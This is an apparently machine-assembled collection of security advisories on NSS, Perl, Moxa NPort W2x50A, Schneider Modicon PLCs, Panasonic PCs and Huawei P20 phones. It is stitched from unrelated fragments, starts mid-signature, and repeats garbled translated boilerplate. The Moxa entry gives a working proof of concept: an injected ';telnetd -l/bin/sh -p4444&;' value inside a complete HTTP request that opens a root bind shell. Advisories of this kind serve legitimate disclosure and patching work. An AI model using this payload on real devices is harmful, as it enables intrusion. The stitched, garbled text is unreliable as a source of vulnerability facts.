gT0QbDrlhldxZ0DLbu81DjgmheYUhv5alY6MR/M5BcBU+MNokEgH7a00go6cbfKE q0kJCTpJpQN4y6t+0Tb6alXYdGLvae9QW85TxWzkYlV2uUxZEegkX07AI9XFpeCN Yr8PjJuMy2HbrB+OAFb/gSm2kC/v37mpIxVQr4HCWcqheKIOsoF/pBELrTJe9ON4 ZLZftXKCLD/Lwb55uDzJHBhSkhCOyBCwNMj2j261keB+X8EuxI8UcnmGR87xTHnd QaZUxlEVzc2ZfCFl2LttiT+v0F1FlbmKkqLlXh7DU5Z05f4evtmQ9D17aQzRNDHL wSLYXpOCaSY&NJ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/mozilla-nss-3.40.1-i586-1_slack14.2.txz: Upgraded. Upgraded to nss-3.40.1 and nspr-4.20. Mitigate cache side-channel variant of the Bleichenbacher attack. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12404 (* Security fix *) +--------------------------+ Where to find the new packages: +-----------------------------+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-nss-3.23-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-nss-3.23-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-nss-3.40.1-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-nss-3.40.1-x86_64-1_slack14.1.txz Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-nss-3.40.1-i586-1_slack14.2.txz Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-nss-3.40.1-x86_64-1_slack14.2.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/mozilla-nss-3.40.1-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/mozilla-nss-3.40.1-x86_64-1.txz MD5 signatures: +-------------+ Slackware 14.0 package: 477aad77295cdad06550ec789db125ed mozilla-nss-3.23-i486-1_slack14.0.txz Slackware x86_64 14.0 package: da2b0d54d5bab3d60766691fefbfe59e mozilla-nss-3.23-x86_64-1_slack14.0.txz Slackware 14.1 package: 2b87e41ebe92bb411f9ba6c7b3dc90a3 mozilla-nss-3.40.1-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 97f5628b15deea966d2e3a53cbf63e41 mozilla-nss-3.40.1-x86_64-1_slack14.1.txz Slackware 14.2 package: 6d3340c45970475bc3aa8329f82c8f1c mozilla-nss-3.40.1-i586-1_slack14.2.txz Slackware x86_64 14.2 package: 0b07bd47fca120a143111804aa70bdd3 mozilla-nss-3.40.1-x86_64-1_slack14.2.txz Slackware -current package: 3b130c0c68b8283c5e243a5a23cfa368 l/mozilla-nss-3.40.1-i586-1.txz Slackware x86_64 -current package: 7191a0d1e6d618e89a0e5014bde3f29e l/mozilla-nss-3.40.1-x86_64-1.txz Installation instructions: +------------------------+ Upgrade the package as root: # upgradepkg mozilla-nss-3.40.1-i586-1_slack14.2.txz +-----+ Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com +------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. ========================================================================== Ubuntu Security Notice USN-3850-2 February 18, 2019 nss vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 ESM Summary: Several security issues were fixed in NSS. This update provides the corresponding update for Ubuntu 12.04 ESM. Original advisory details: Keegan Ryan discovered that NSS incorrectly handled ECDSA key generation. A local attacker could possibly use this issue to perform a cache-timing attack and recover private ECDSA keys. (CVE-2018-0495) It was discovered that NSS incorrectly handled certain v2-compatible ClientHello messages. A remote attacker could possibly use this issue to perform a replay attack. (CVE-2018-12384) It was discovered that NSS incorrectly handled certain padding oracles. A remote attacker could possibly use this issue to perform a variant of the Bleichenbacher attack

An exploitable authenticated command-injection vulnerability exists in the web server functionality of Moxa NPort W2x50A products with firmware before 2.2 Build_18082311. A specially crafted HTTP POST request to /goform/webSettingProfileSecurity can result in running OS commands as the root user. Moxa NPort W2x50A Product firmware includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Exploitation required authentication. This is similar to CVE-2017-12120. Proof-of-concept: 1. Authenticate to Moxa NPort W2x50A device. 2. Go to Main menu a System Management a Maintenance a Ping a Destination 3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field 4. Exploitation required authentication. Proof-of-concept (sample HTTP request opening bind shell on port 4444): POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1 Host: {IP:PORT} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: SessionID={YOURSESSIONID} Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 309 Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&; These vulnerabilities were fixed in the firmware version 2.2 Build_18082311. https://www.moxa.com/support/download.aspx?type=support&id=14781 Best regards, Maksim Khazov

Perl before 5.26.3 and 5.28.x before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations. Perl Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Perl is prone to the following multiple buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. 1. An integer-overflow vulnerability 2. A heap-based buffer-overflow vulnerability Attackers can exploit these issues to execute arbitrary code on the affected application. Failed attempts will likely cause a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Important: rh-perl524-perl security update Advisory ID: RHSA-2019:0010-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2019:0010 Issue date: 2019-01-02 CVE Names: CVE-2018-18311 CVE-2018-18312 CVE-2018-18313 CVE-2018-18314 ==================================================================== 1. Summary: An update for rh-perl524-perl is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.4) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 3. Description: Perl is a high-level programming language that is commonly used for system administration utilities and web programming. Red Hat would like to thank the Perl project for reporting these issues. Upstream acknowledges Jayakrishna Menon as the original reporter of CVE-2018-18311; Eiichi Tsukata as the original reporter of CVE-2018-18312 and CVE-2018-18313; and Jakub Wilk as the original reporter of CVE-2018-18314. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6): Source: rh-perl524-perl-5.24.0-381.el6.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el6.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el6.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6): Source: rh-perl524-perl-5.24.0-381.el6.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el6.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el6.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: rh-perl524-perl-5.24.0-381.el7.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el7.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.4): Source: rh-perl524-perl-5.24.0-381.el7.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el7.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5): Source: rh-perl524-perl-5.24.0-381.el7.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el7.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6): Source: rh-perl524-perl-5.24.0-381.el7.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el7.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el7.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: rh-perl524-perl-5.24.0-381.el7.src.rpm noarch: rh-perl524-perl-Locale-Maketext-Simple-0.21-381.el7.noarch.rpm x86_64: rh-perl524-perl-tests-5.24.0-381.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2018-18311 https://access.redhat.com/security/cve/CVE-2018-18312 https://access.redhat.com/security/cve/CVE-2018-18313 https://access.redhat.com/security/cve/CVE-2018-18314 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXCzjWdzjgjWX9erEAQgGbxAAjUats4SSpuFti8OldbpStTe7erlyVhih Gh5YONFxhYXSTeCv064Qbm+3m6gxbHBuQtsydMtXYGuMhA6ire2vQkJGT4/IAE1y 55aL3GLosOiqdu/yrydYnnSfxVBitY5dxN4sUBSeh54HOHzPx247zVMzMD2AwPQy DpdQ639qseh+Aq79z0ZOqofH9PHX3XDm2kypR7mhohxkORJ0rkoHAKgIfn5y7Y79 w8vTRn+S6C4goJUCMOUYU4eSuFx2PV6abOTvodGfPO2PPwivkVDIqr2UxMEZV4nA wh13K9FteozKWQApxVIkR3ipg55SHC9xHd1vpsnZRnGrnG4bO0EOTcsQ/9N2FztR soBINhCU0ycU9/Fal1Ul4COp6F2vpDsMveeMXcnmNX+f8H8UOtd8VoR5sJ6fhApC Lb+20d2AWuClUtqBghcRMTlXxYOu7KWYGVbamfDeIOH6p/p4XA8iDUeUFB5B4v4s eAnD0bqK1RRFpuOPO2Fi5F/LZ18olTA7TuTWDmBwj27nYxaLunZtctaLg6p/QgYS T5mPOFl6CGnafhZgy0iihwCCEjIcz34vPUe9kmK7ywBoJ3GIfNnGJmOs+FC7ntzQ L9YCjVEk5e8hTDGq6HohPF73gxAwdQVNYxzLoh7XmAvcBefL/eAK+YhDhCtc0ZUb ul+etyPMblM=Fj2Q -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . The following packages have been upgraded to a later upstream version: rh-perl526-perl (5.26.3), rh-perl526-perl-Module-CoreList (5.20181130). The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2018-18311 Jayakrishna Menon and Christophe Hauser discovered an integer overflow vulnerability in Perl_my_setenv leading to a heap-based buffer overflow with attacker-controlled input. For the stable distribution (stretch), these problems have been fixed in version 5.24.1-3+deb9u5. We recommend that you upgrade your perl packages. For the detailed security status of perl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/perl Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlwAY45fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0SexQ/+OyRsCOK4ZPjoe/mZD6nYcTZskjNu6o0XbV0dUwqGLz3+ztWAitThvLqw OdbVmhPD9OBPXEw/CEGG/AzCzy+TTuo4B6CEevTviEq2ACS6MHWpXYk98qSLE+4a 1S+MO+kmziz1NKDJ11/7mUcS+hAoeCSbKpwkcBztyMqgMrbNpzOnlsNcXwu7kiTc TMrTrTh8a/AWYN/IZITUN742STKODbdb86Zmypl6ecdOCY0kQLlrVbSH9SaEUr0v y0R8dvl0g87lq+ipxhU2IiDzBgymf5HagvCAKcnUKWylPg/Dgtj3f7VjaK1I9cr0 GMpTCFoxw6fHsi221JzTKCYLjRC+kd0eQ+XbJmT1Djw5MBnkToNAQrvne7otNu2r VM+pV8Iizze/UiGD33VOYCA9ukzExtQVk1aqXd7jb+s0GC3bThHwApkI2pWIH422 u8fZ4nlc4TBFXzKznT7GHiPMCLL3VxxAeOD0KPrL87Z+XIZTd2ZnuAtbTt3gpDY7 rmlKsCq7ovGYOMqzmT7sNrBG0dTUogDK+pqfsDw780kmlric5/lhpTROBIj1l/Sn XN3ja2TsEwQyyzHd+tjBVxyGygawsa662PeZoL9B6iWGdSeoOhGjDHFXgyNJR4/7 49pvIdcgt0AxftuwlfN4W0h+8rhRFxNggFpC2dtGLZPhXfYI++s=tA1+ -----END PGP SIGNATURE----- . 7.5) - ppc64, ppc64le, s390x, x86_64 3. ========================================================================== Ubuntu Security Notice USN-3834-1 December 03, 2018 perl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 18.10 - Ubuntu 18.04 LTS - Ubuntu 16.04 LTS - Ubuntu 14.04 LTS Summary: Several security issues were fixed in Perl. Software Description: - perl: Practical Extraction and Report Language Details: Jayakrishna Menon discovered that Perl incorrectly handled Perl_my_setenv. (CVE-2018-18311) Eiichi Tsukata discovered that Perl incorrectly handled certain regular expressions. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 18.10. (CVE-2018-18312) Eiichi Tsukata discovered that Perl incorrectly handled certain regular expressions. An attacker could use this issue to cause Perl to crash, resulting in a denial of service. (CVE-2018-18313) Jakub Wilk discovered that Perl incorrectly handled certain regular expressions. An attacker could use this issue to cause Perl to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 18.10. (CVE-2018-18314) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 18.10: perl 5.26.2-7ubuntu0.1 Ubuntu 18.04 LTS: perl 5.26.1-6ubuntu0.3 Ubuntu 16.04 LTS: perl 5.22.1-9ubuntu0.6 Ubuntu 14.04 LTS: perl 5.18.2-2ubuntu1.7 In general, a standard system update will make all the necessary changes

An Unverified Password Change vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 which could allow an unauthenticated remote user to access the change password function of the web server. plural Modicon The product contains a vulnerability related to the password management function.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Schneider Electric Modicon M340 and other are programmable logic controller products of Schneider Electric (France). A number of Schneider Electric products have licensing issues. An attacker could use the / unsecure / embedded / builtin endpoint to exploit this vulnerability to change a user's password without authentication

An unquoted search path vulnerability in some pre-installed applications on Panasonic PC run on Windows 7 (32bit), Windows 7 (64bit), Windows 8 (64bit), Windows 8.1 (64bit), Windows 10 (64bit) delivered in or later than October 2009 allow local users to gain privileges via a Trojan horse executable file and execute arbitrary code with eleveted privileges. Some pre-installed applications on Panasonic PCs register Windows services with unquoted file paths (CWE-428). Panasonic Corporation reported this vulnerability to JPCERT/CC to notify users of its solution through JVN. JPCERT/CC and Panasonic Corporation coordinated under the Information Security Early Warning Partnership.If a malicious executable is placed on a certain path, it may be executed with the elevated privilege. PanasonicPC is a computer device from Matsushita Electric Industrial Co., Ltd. of Japan. An attacker could exploit the vulnerability to execute files with elevated privileges

An Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 allowing an attacker to send a specially crafted URL to a currently authenticated web server user to execute a password change on the web server. plural Modicon The product contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SchneiderElectricModiconM340 and others are programmable logic controller products from Schneider Electric of France

There is an out-of-bounds write vulnerability on Huawei P20 smartphones with versions before 8.1.0.171(C00). The software does not handle the response message properly when the user doing certain inquiry operation, an attacker could send crafted message to the device, successful exploit could cause a denial of service condition. HuaweiP20 is a smartphone of Huawei. HuaweiP20 has a memory write cross-border vulnerability. The successful use of this vulnerability can cause the mobile phone to refuse service